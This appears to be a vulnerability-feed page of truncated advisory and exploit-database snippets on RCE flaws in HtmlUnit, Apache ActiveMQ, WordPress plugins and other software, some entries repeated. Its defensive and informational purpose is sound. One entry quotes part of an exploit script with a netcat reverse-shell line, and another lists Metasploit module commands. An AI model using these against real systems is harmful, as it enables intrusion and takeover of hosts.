CVE-2023-49093 HtmlUnit vulnerable to Remote Code Execution (RCE) via XSTL

HtmlUnit is a GUI-less browser for Java programs. HtmlUnit is vulnerable to Remote Code Execution RCE via XSTL, when browsing the attacker’s webpage. This vulnerability has been patched in version 3.9.0...

CVE-2023-49093

HtmlUnit (Java GUI-less browser) is affected by CVE-2023-49093 where an RCE can be triggered via an XSLT processing flaw when loading attacker-controlled content. The issue stems from XSLT processing not enforcing secure processing, enabling remote code execution on a vulnerable system. A patch i...

CVE-2023-49093 HtmlUnit vulnerable to Remote Code Execution (RCE) via XSTL

HtmlUnit is a GUI-less browser for Java programs. HtmlUnit is vulnerable to Remote Code Execution RCE via XSTL, when browsing the attacker’s webpage. This vulnerability has been patched in version 3.9.0...

Amazon Linux 2 : php (ALAS-2023-2375)

The version of php installed on the remote host is prior to 5.4.16-46. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2-2023-2375 advisory. An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5...

Exploit for Cross-site Scripting in Helpsystems Cobalt_Strike

Gui-poc-test A testing tool for CobaltStrike-RCE:CVE-2022-3919...

Quick Quiz 2.4 File Upload - Remote Code Execution Vulnerability

Title: Quick-Quiz-2.4 File Upload - RCE Author: nu11secur1ty Vendor: https://mediacity.co.in/mediacity/ Software: https://codecanyon.net/item/quick-quiz-laravel-quiz-and-exam-system/21117633?srank=14 Reference: https://portswigger.net/web-security/file-upload,...

Metasploit Weekly Wrap-Up

Customizable DNS resolution Contributor smashery added a new dns command to Metasploit console, which allows the user to customize the behavior of DNS resolution. Similarly to the route command, it is now possible to specify where DNS requests should be sent to avoid any information leak. Before...

Chamilo LMS 1.11.x < 1.11.24 Multiple Vulnerabilities

Chamilo LMS is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:chamilo:chamilolms"; if...

CVE-2023-47418

The CVE-2023-47418 entry concerns O2OA, affected in versions 8.1.2 and earlier. The vulnerability allows Remote Code Execution by attackers who can create a new interface in the service management function to run JavaScript. Impact is described as high (RCE) and accessible over network with no pr...

Online Student Clearance System 1.0 Shell Upload Exploit

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

CVE-2023-49693 NETGEAR ProSAFE Network Management System RCE via Unprotected Access to Java Debug Wire Protocol

NETGEAR ProSAFE Network Management System has Java Debug Wire Protocol JDWP listening on port 11611 and it is remotely accessible by unauthenticated users, allowing attackers to execute arbitrary code...

rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Subscriber+ RCE

Description The plugin does not validate files to be uploaded, which could allow attackers with a low-privilege account e.g. subscribers to upload arbitrary files such as PHP on the server If plugin JSON API is enabled, any logged-in user may execute arbitrary code by uploading a PHP file. After...

rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Admin+ RCE

Description The plugin loads the contents of the import file in an unsafe manner, leading to remote code execution by privileged users. 1. As an admin, visit rtMedia Settings Export/Import. 2. Click the "Browse File" button beside "Import rtMedia Settings". 3. Upload a file with the extension .js...

WordPress Royal Elementor Addons RCE

Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin use exploit/multi/http/wproyalelementoraddonsrce msf exploitwproyalelementoraddonsrce show targets ...targets... msf exploitwproyalelementoraddonsrce set TARGET msf...

GHSA-53V4-42FG-G287 Apache ActiveMQ Deserialization of Untrusted Data vulnerability

Once an user is authenticated on Jolokia, he can potentially trigger arbitrary code execution. In details, in ActiveMQ configurations, jetty allows org.jolokia.http.AgentServlet to handler request to /api/jolokia org.jolokia.http.HttpRequestHandlerhandlePostRequest is able to create JmxRequest...

CVE-2022-41678

Once an user is authenticated on Jolokia, he can potentially trigger arbitrary code execution. In details, in ActiveMQ configurations, jetty allows org.jolokia.http.AgentServlet to handler request to /api/jolokia org.jolokia.http.HttpRequestHandlerhandlePostRequest is able to create JmxRequest...

CVE-2022-41678

CVE-2022-41678 : In Apache ActiveMQ, after authentication, an attacker can trigger remote code execution via Jolokia/JMX vectors (e.g., /api/jolokia) leading to arbitrary code with webshell write via Log4j/JFR paths. The root cause is an unsafe deserialization path that can be reached through Jol...

CVE-2022-41678 Apache ActiveMQ: Insufficient API restrictions on Jolokia allow authenticated users to perform RCE

Once an user is authenticated on Jolokia, he can potentially trigger arbitrary code execution. In details, in ActiveMQ configurations, jetty allows org.jolokia.http.AgentServlet to handler request to /api/jolokia org.jolokia.http.HttpRequestHandlerhandlePostRequest is able to create JmxRequest...

CVE-2022-41678

Once an user is authenticated on Jolokia, he can potentially trigger arbitrary code execution. In details, in ActiveMQ configurations, jetty allows org.jolokia.http.AgentServlet to handler request to /api/jolokia org.jolokia.http.HttpRequestHandlerhandlePostRequest is able to create JmxRequest...

Remote Code Execution

HotelDruid is vulnerable to Remote Code Execution RCE. The vulnerability is via the backup/restore feature. It can lead to compromising Confidentiality, Integrity and Availability of the system...